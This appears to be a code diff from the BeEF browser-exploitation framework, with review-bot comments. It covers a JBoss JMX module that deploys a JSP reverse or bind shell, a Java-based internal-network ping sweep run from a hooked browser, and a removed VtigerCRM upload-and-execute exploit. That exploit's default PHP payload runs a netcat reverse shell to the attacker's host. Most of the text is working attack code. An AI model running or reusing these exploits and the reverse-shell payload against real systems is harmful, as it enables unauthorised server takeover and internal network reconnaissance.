# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Jboss_jmx_upload_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
{'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'},
{'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666'},
{'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'},
{'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)},
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['reverse'],['bind']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end


@@ -0,0 +1,80 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var ips = new Array();
ipRange = "<%= @ipRange %>";
timeout = "<%= @timeout %>";
delay = parseInt(timeout) + parseInt("<%= @delay %>");
// ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
// Note: if ipRange is just an IP address like 192.168.0.1, the ips array will contain only one element: ipBounds[0]
// (only C class IPs are supported atm). Same code as internal_network_fingerprinting module
ipBounds = ipRange.split('-');
if(ipBounds.length>1) {
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for(i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i
ips.push(ipToTest);
}
} else {
ipToTest = ipBounds[0]
ips.push(ipToTest);
}
if(ips.length==1) verbose=true;
else verbose=false; /* enable for debug */
function do_scan(host, timeout) {
var status=false;
ping="";
try {
status = java.net.InetAddress.getByName(host).isReachable(timeout);
} catch(e) { /*handle exception...? */ }
if (status) {
ping = host + " is alive!";
} else {
if(verbose) {
ping = host + " is not alive";
}
}
return ping;
}
// call do_scan for each ip
// use of setInterval trick to avoid slow script warnings
i=0;
if(ips.length>1) {
int_id = setInterval( function() {
host = do_scan(ips[i++],timeout);
if(host!="") beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host='+host);
if(i==ips.length) { clearInterval(int_id); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host=Ping sweep finished'); }
}, delay);
} else {
host = do_scan(ips[i],timeout);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host='+host);
}
});
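Review bot: The loop bounds in `for(i=lowerBound;i<=upperBound;i++){` are strings produced by split('.'), so the first `i<=upperBound` test is a lexicographic string comparison (for instance "100" <= "99" is true) before `i++` coerces i to a number, and `i`, `lowerBound`, `upperBound`, `ipToTest`, `verbose`, `ping`, `host` and `int_id` are all assigned without `var`, leaking into the hooked page's global scope. Parsing the octets once fixes both: `var lowerBound = parseInt(ipBounds[0].split('.')[3], 10);`, `var upperBound = parseInt(ipBounds[1].split('.')[3], 10);` and `for(var i=lowerBound; i<=upperBound; i++){`. The empty `catch(e) { /*handle exception...? */ }` around `isReachable` also hides the case where the `java` LiveConnect object is not available at all, so the operator only ever sees "Ping sweep finished" and cannot distinguish a scan that ran from one that never could; a `typeof java == 'undefined'` check that reports a distinct error before the interval is scheduled would keep the result honest.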


@@ -15,11 +15,12 @@
#
beef:
module:
jboss_jmx_upload_exploit:
ping_sweep:
enable: true
category: "Network"
name: "Jboss 6.0.0M1 JMX Deploy Exploit"
description: "Deploy a JSP reverse or bind shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.<br>Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload, in case you are using the reverse payload."
authors: ["antisnatchor", "l33tb0y"]
name: "Ping Sweep"
description: "Discover active hosts in the internal network of the hooked browser. It works calling a Java method from JavaScript and do not require user interaction."
authors: ["jgaliana"]
target:
working: ["ALL"]
working: ["FF"]
not_working: ["C", "S", "O", "IE"]
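Review bot: The `description:` line has a grammar slip ("do not require" with a singular subject) and leaves out the prerequisite that apparently motivates `working: ["FF"]`: the module's script calls `java.net.InetAddress` via the `java` LiveConnect object, which presumably needs the Java plugin to be present and enabled, not just Firefox. Suggest `description: "Discover active hosts in the internal network of the hooked browser. It calls a Java method from JavaScript (requires Java/LiveConnect in the browser) and does not require user interaction."` so an operator reading the module list understands why a Firefox target without Java is likely to report no hosts.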


@@ -0,0 +1,40 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Ping Sweep Module - jgaliana
# Discover active hosts in the internal network of the hooked browser.
# It works calling a Java method from JavaScript and do not require user interaction.
class Ping_sweep < BeEF::Core::Command
def self.options
return [
{'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class or IP)', 'value' => '192.168.0.1-192.168.0.254'},
{'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '1000'},
{'name' => 'delay', 'ui_label' => 'Delay between requests (ms)', 'value' => '100'}
]
end
def post_execute
content = {}
content['host'] =@datastore['host'] if not @datastore['host'].nil?
if content.empty?
content['fail'] = 'No active hosts have been discovered.'
end
save content
end
end
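Review bot: In `post_execute`, `content['host'] =@datastore['host'] if not @datastore['host'].nil?` is missing a space after `=` and uses `if not` where Ruby style prefers `unless`; `content['host'] = @datastore['host'] unless @datastore['host'].nil?` reads the same and passes RuboCop, and the explicit `return [` in `self.options` is redundant since the array literal is the last expression. Note that `@datastore['host']` is a string supplied by the hooked browser, so it should be treated as untrusted wherever the saved result is rendered (not visible in this hunk whether the UI escapes it). The three option values are interpolated unescaped into the JavaScript template as `"<%= @ipRange %>"`, `"<%= @timeout %>"` and `"<%= @delay %>"`, so a stray quote or non-numeric entry in the UI silently produces a script that fails in the browser; validating them as an IPv4 or IPv4-IPv4 range and integer milliseconds before they reach the template (wherever that rendering happens, outside this hunk) would surface the mistake to the operator instead.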


@@ -1,218 +0,0 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)
// Ported to Ruby BeEF by xntrik 2010
beef.execute(function() {
//Doing the same trick I used in detect_tor to ensure exploit runs once
// xntrik
if (document.getElementById('vtigerimg')) {
//document.body.removeChild(document.getElementById('vtigerimg'));
//beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=There was a stagnant vtiger ID. Aborted!');
return "Exploit running already";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.id = 'vtigerimg';
document.body.appendChild(img);
baseurl = "<%= @vtiger_url %>";
function get_ajax() {
var http_request;
// use the ActiveX control for IE5.x and IE6
try {
http_request = new ActiveXObject("MSXML2.XMLHTTP");
} catch (othermicrosoft){
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (native) {
// If IE7, Mozilla, Safari, etc: Use native object
http_request = new XMLHttpRequest();
}
}
return http_request;
}
function do_upload(){
setTimeout(function() {ajax_upload()}, 1000);
}
// In a nutshell:
//
// 1) build url
// 2) construct the request object
// 3) POST the form
// 4) once requestdone, call do_callfile()
function ajax_upload(){
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
var http_request;
http_request = false;
http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
//prepare the POST
var boundaryString = 'PWNED';
var boundary = '-----------------------------PWNED';
var requestbody =
boundary + '\r\n'
+ 'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + '\r\n'
+ '\r\n'
+ 3000000 + '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_module"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_action"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_id"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="uploadsubject"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n'
+ 'Content-Type: application/x-httpd-php' + '\r\n'
+ '\r\n'
+ '<%= @vtiger_php %>' + '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n'
+ '\r\n'
+ '<%= @mal_filename %>.<%= @mal_ext %>'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="txtDescription"' + '\\r\n'
+ '\r\n'
+ 'drop it like its hot' + '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="save"' + '\r\n'
+ '\r\n'
+ 'Attach' + '\r\n'
+ boundary;
var uploadstate = 0;
http_request.onreadystatechange = function() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
uploadstate = 3;
} else {
uploadstate = 2;
}
} else {
uploadstate = 1;
}
return;
};
http_request.open("POST", targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
setTimeout(function() {
if (uploadstate == 0) {
//something went way wrong
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Error in file upload');
} else if (uploadstate == 1) {
//we never got a response from the server
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server did not respond while trying to upload file');
} else if (uploadstate == 2) {
//we got a response that was NOT a 200
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server gave an invalid response while trying to upload file');
} else if (uploadstate == 3) {
//We got a 200, so hopefully the file was uploaded
//be_graceful();
do_callfile(0, 1000);
}
},<%= @upload_timeout %>);
return;
}
function do_callfile(start, count){
if (document.getElementById('vtigerimg') == null) {
return false;
}
for (i=start;i<=start+count;i++)
{
var http_request = false;
http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";
var requestbody = "birds of a feather flock together";
http_request.open('POST', findurl, false);
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
if (http_request.status == 200) {
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=File Uploaded AND Executed ('+findurl+')');
return;
}
}
return;
}
// Try the upload
function do_main(){
do_upload();
return;
}
// Run the sploit
do_main();
});


@@ -1,46 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Vtiger_crm_upload_exploit < BeEF::Core::Command
def self.options
time = Time.new
weekno = case time.day
when 1..7 then 1
when 8..14 then 2
when 15..21 then 3
when 22..28 then 4
else 5
end
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
return [
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
{'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
{'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
{'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
]
end
def post_execute
return if @datastore['result'].nil?
save({'result' => @datastore['result']})
end
end